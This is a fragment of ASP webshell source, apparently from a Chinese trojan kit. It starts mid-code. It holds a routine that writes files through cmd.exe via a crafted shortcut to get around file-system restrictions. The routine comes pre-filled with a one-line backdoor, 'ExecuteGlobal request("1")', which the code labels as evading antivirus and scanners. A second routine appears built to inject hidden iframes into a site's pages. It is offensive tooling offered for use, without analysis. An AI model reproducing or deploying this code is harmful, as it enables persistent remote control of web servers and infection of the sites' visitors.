asp木马代码解密的随机加密webshell

temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("")&"","",1,1,1),"","")&""",""MoveFile"")' class='am' title='移动'>Move</a>"
Report = Report&"<tr><td height=30>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
Sun = Sun + 1
Exit Sub
End If
End If
Next
End Sub:Case "nofw"
PaTh=trim(REquEst.form("PaTh"))
text=trim(REquEst.form("text"))
if text<>"" and PaTh<>"" thEn
text=REplAcE(text,"^","^^")
text=REplAcE(text,">","^>")
text=REplAcE(text,"<","^<")
text=REplAcE(text,"&","^&")
text=REplAcE(text,":","^:")
text=REplAcE(text,"+","^+")
text=REplAcE(text,"|","^|")
text=REplAcE(text,chr(34),"^"&chr(34))
Dim myArray
Dim b()
k=0
myarray= Split(text,Chr(13))
For i=0 to UBound(myarray)
for j=1 to len(myarray(i))
if mid(myarray(i),j,1)<>" " and mid(myarray(i),j,1)<>chr(10) and mid(myarray(i),j,1)<>chr(13) thEn
tn=0
exit for
end if
next
If tn=0 and myarray(i)<> "" and myarray(i)<>chr(13) and myarray(i)<>chr(10) thEn
k=k+1
ReDim pREserve b(k)
b(k)=myarray(i)
b(k)=REplAcE(b(k),chr(10),"")
End If
tn=1
Next
set shell=SErvEr.createobject("shell.application")
For L=1 TO k
REsPonsE.writE SErvEr.htmlencode(b(L))&"</br>"
set shellfolder=shell.namespace("C:Documents and SettingsDefault UsEr「开始」菜单程序附件")
set shellfolderitEm=shellfolder.parsename("记事本.lnk")
set objshelllink =shellfolderitEm.getlink
objshelllink.PaTh="cmd.exe"
objshelllink.arguments="/c echo "&b(L)&" >>"&PaTh&" &&DEl c:a.lnk"
objshelllink.save("c:a.lnk")
shell.namespace("c:").itEms.itEm("a.lnk").invokeverb
timeit(0.1)
next
Function TimeIt(N)
StartTime = Timer
do while endtime-starttime<n
EndTime = Timer
loop
End Function
REsPonsE.writE k
end if
RRS"<form method='post' action=?action=nofw>"
RRS"免FSO-WSH写入的文件:<input type=text name=PaTh size=40 value='"&Server.MapPath("/")&"help.asp'><p>"
RRS"<textarea name=text rows=30 cols=100 >防杀防扫一句话代码"&Chr("60")&"%ExecuteGlobal request(""1"")%"&Chr("62")&"</textarea><p>"
RRS"<input type=submit value=执行></form>":Case "plgm":Server.ScriptTimeout=1000000:Response.Buffer=False
RRS ("<b>当前网站绝对路径:")&Server.MapPath("/")&("</b>")
ASP_SELF=Request.ServerVariables("PATH_INFO")
s=Request("fd")
if s="" then s=Server.MapPath("/")
ex=Request("ex")
pth=Request("pth")
newcnt=Request("newcnt")
addcode = Request("code")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0 height=0></iframe>"
If ex<>"" AND pth<>"" Then
select Case ex
Case "edit"
CALL file_show(pth)
Case "save"
CALL file_save(pth)